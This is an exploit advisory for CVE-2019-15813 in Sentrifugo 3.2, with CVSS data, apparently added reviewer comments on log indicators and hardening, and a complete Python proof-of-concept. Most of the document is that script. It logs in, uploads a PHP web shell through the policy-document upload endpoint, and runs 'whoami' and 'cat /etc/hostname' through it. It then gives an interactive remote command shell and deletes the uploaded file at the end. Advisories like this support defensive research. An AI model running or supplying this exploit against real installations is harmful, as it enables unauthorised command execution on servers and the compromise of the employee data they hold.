Sentrifugo 3.2 Shell Upload / Restriction Bypass

2020.10.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor
#
# Reviewer summary of what this PoC demonstrates, as visible in the code below:
#   1. It authenticates with caller-supplied credentials, so the issue is only
#      reachable by an account that can log in.
#   2. It sends a multipart upload (field "myfile", client filename "shell.php")
#      to the policy-document upload endpoint, which answers with JSON that
#      includes the server-side stored name (filedata.new_name).
#   3. It requests the stored file under /public/uploads/policy_doc_temp/,
#      where the server runs it as PHP.
#
# What to look for in logs and on disk:
#   - POST /index.php/policydocuments/uploaddoc followed by POST requests to a
#     file under /public/uploads/policy_doc_temp/ from the same session.
#   - Script files (.php) present in the policy_doc_temp upload directory.
#   - The web-server account spawning OS commands (the script issues "whoami",
#     "cat /etc/hostname" and "rm").
#
# Hardening direction: enforce a server-side allow-list on stored extension and
# content type, keep uploads out of the web root or disable script execution
# for the upload directory, and apply the vendor fix for CVE-2019-15813 where
# one is available.

from argparse import ArgumentParser, RawTextHelpFormatter
# NOTE(review): BeautifulSoup, Tag, tmp and path are imported but never
# referenced anywhere in the visible script.
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
# Star import; presumably the source of run/bad/good/info/lightgreen/blue used
# below for coloured console output -- confirm against huepy.
from huepy import *

# Command-line interface: base URL of the installation plus the credentials of
# an existing account. All three options are mandatory.
parser = ArgumentParser(description="Exploit for CVE-2019-15813", formatter_class=RawTextHelpFormatter)
parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t")
parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u")
parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p")
args = parser.parse_args()

# Drop one trailing slash so the path concatenations below do not produce "//".
if args.t.endswith("/"):
    args.t = args.t[:-1]

# NOTE(review): F is assigned here but never read again in the visible script;
# the upload below uses the constant client filename "shell.php".
F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

# One Session carries the login cookies through every later request.
with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}
    # Redirects are not followed so the Location header of the login response
    # can be inspected directly.
    r = http.post(args.t + "/index.php/index/loginpopupsave", data=data, allow_redirects=False)
    # Login is treated as successful only when the redirect target ends in
    # "welcome" or "welcome/".
    if not (r.headers.get("Location", "").endswith("welcome") or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    # Multipart field "myfile" with a .php client filename and a PHP body; the
    # upload endpoint accepting this is the restriction bypass the advisory
    # title refers to.
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}
    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    # The JSON response discloses the name the server stored the file under.
    file_name = r.json()["filedata"]["new_name"]

    print(info("Spawning shell"))
    # Two probe requests whose output is used only to build the prompt string.
    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
    # Interactive loop: each input line becomes one POST with a "cmd" form
    # field to the uploaded file; "exit" or any Exception ends the loop.
    while True:
        try:
            cmd = input(shell)
            if cmd == "exit":
                break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    # Asks the uploaded file to delete itself, then treats a 404 on a follow-up
    # GET as confirmation. NOTE(review): this removes only the file; requests
    # already recorded in web-server access logs, where logging is enabled,
    # are not affected by anything in this script.
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))

